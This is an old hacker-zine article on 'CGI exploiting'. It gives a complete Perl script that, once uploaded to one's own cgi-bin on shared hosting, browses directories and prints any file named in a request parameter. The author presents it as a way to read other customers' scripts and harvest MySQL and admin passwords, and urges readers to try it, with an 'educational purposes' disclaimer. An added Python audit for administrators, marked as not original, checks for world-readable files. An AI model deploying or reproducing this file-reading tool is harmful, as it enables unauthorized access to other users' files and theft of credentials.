1x10 CGI Exploiting

Published in phearless · 10 months ago

 
...................
...::: phearless zine #1 :::...

.......................>---[ CGI Exploiting ]---<.........................

........................>---[ by De1Rekt0n ]---<..........................
mil0s[at]headcoders[dot]net


Many servers today support CGI. CGI is the Common Gateway Interface, yet
another server-side scripting language that lets you get quite a lot done.
Most servers are leaky, so your own script can read files on the server
where you have hosting. In other words, you can walk around the server and
read other people's scripts, in which you can often find passwords for
MySQL access or for the admin sections of a site.

I wrote a CGI script that does this job. I hope it comes in handy; I did
not put much effort into polishing the script, it simply does the job:

------------------------------------------------------------exploit.cgi
#!/usr/bin/perl
#####################################################
#coded by De1Rekt0n #
#####################################################
&get_form;
use CGI qw (:standard);
$q= new CGI;
$dir=$FORM{selected};
$file=$FORM{fajl};
$filename = "exploit.cgi";
$putanja="/$dir";
print $q->header;

print<<EOF;

<html>
<head>
<title>CGI exploit coded by De1Rekt0n</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<table width="80%" border="0" align="center" height="180">
<tr>
<td bgcolor="#003366" width="42%" height="33"><font face="Verdana,
Arial, Helvetica, sans-serif"
color="#FFFFFF">cgi
exploit coded by De1Rekt0n</font></td>
<td width="58%" height="33"> </td>
</tr>
<tr>
<td width="42%" align="left" valign="top" rowspan="2"><font
face="Geneva, Arial, Helvetica, san-serif" size="-1">Files and directories
in current directory<br>
EOF
open (FAJLA, "$file");

while (defined ($red=<FAJLA>)) {
chomp ($red);
print "<BR>$red";
}
close FAJLA;

opendir (DIR, "$putanja");
@fajlovi = readdir(DIR);
closedir(DIR);
$i=0;
while(defined($fajl=$fajlovi[$i])){
chomp ($fajl);


print<<HTML;
<form name="form1" method="post" action="$filename">
<a
href="$filename?selected=$putanja/$fajl&fajl=$putanja/$fajl">$fajl</a><BR>
<input type="hidden" name="selected" value="$putanja/$fajl">
<input type="hidden" name="fajl" value="$fajl">
HTML
$i=$i+1;
}
print<<EOF;
</font></td>
<td width="58%" align="left" valign="top" height="22"><font
face="Geneva, Arial, Helvetica, san-serif" size="-1">Current directory
:$putanja</font></td>
</tr>
<tr>
<td width="58%" align="left" valign="top">

</td>
</tr>
</table>


</body>
</html>
EOF
exit;
###########################################################
# form parsing #
###########################################################
sub get_form {

if ($ENV{"REQUEST_METHOD"} eq 'GET') {
$buffer = $ENV{'QUERY_STRING'};
} else {
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
}
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
}
--------------------------------------------------------------------EOF

That is all; there is not much more to say about this. You simply upload
the script, put it in your cgi-bin directory, chmod it to 755, and that is
it. Unfortunately most admins do not care about this, so it works on many
servers; try it out.
I am in no way responsible for any damage you cause. This is intended for
educational purposes only, and so that admins pay attention and patch this.
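
An added example for administrators (not part of the original article or the author's code): a Python audit that walks a hosting area and reports which directories another account's script could list and which files it could read, which is the access the article's script depends on. It assumes each customer's CGI runs under a separate Unix account, so only the "other" permission bits matter; the directory names and file contents in `build_demo_tree` are constructed sample data.

```python
import os
import stat
import tempfile

def audit_tree(root):
    """Return (listable_dirs, readable_files) that 'other' users can reach under root.

    A file counts only if every directory from root down to it has o+x:
    without search permission the path cannot be resolved at all.
    """
    listable, readable = [], []
    for dirpath, dirnames, filenames in os.walk(root):
        mode = os.lstat(dirpath).st_mode
        if not mode & stat.S_IXOTH:
            dirnames[:] = []          # others cannot traverse: prune this subtree
            continue
        if mode & stat.S_IROTH:       # o+r on a directory allows readdir()
            listable.append(os.path.relpath(dirpath, root))
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IROTH:
                readable.append(os.path.relpath(path, root))
    return sorted(listable), sorted(readable)

def build_demo_tree():
    """Constructed sample layout standing in for a shared-hosting home area."""
    root = tempfile.mkdtemp()
    layout = {  # relative path -> mode; directories end with "/"
        "alice/": 0o755, "alice/config.php": 0o644, "alice/admin.php": 0o600,
        "bob/": 0o750, "bob/config.php": 0o644,
        "carol/": 0o711, "carol/db.inc": 0o644,
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel.rstrip("/"))
        if rel.endswith("/"):
            os.mkdir(path)
        else:
            with open(path, "w") as fh:
                fh.write("$db_pass = 'constructed-sample';\n")
        os.chmod(path, mode)          # set explicitly so the umask does not matter
    os.chmod(root, 0o755)
    return root

if __name__ == "__main__":
    dirs, files = audit_tree(build_demo_tree())
    print("listable by other users:", dirs)
    print("readable by other users:", files)
```

In the sample tree, `carol/` (mode 711) cannot be listed, but `carol/db.inc` is still reported because a file with a guessable name stays readable once its directory is traversable; `bob/` (mode 750) is pruned entirely.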

Greetings: CyberB, BaCkSpAcE, PhrozenShade, _bl00dZ3r0_, AcidCookie,
BoyScout, DownBload, h4z4rd, fr1tz, Shatterhand, EsC, Exoduks, Re00t,
SunDance and everyone I forgot...

+---------------------------+
|site1: www.coders.co.yu |
|site2: www.ii-labs.org |
|mail: mil0s@headcoders.net|
+---------------------------+
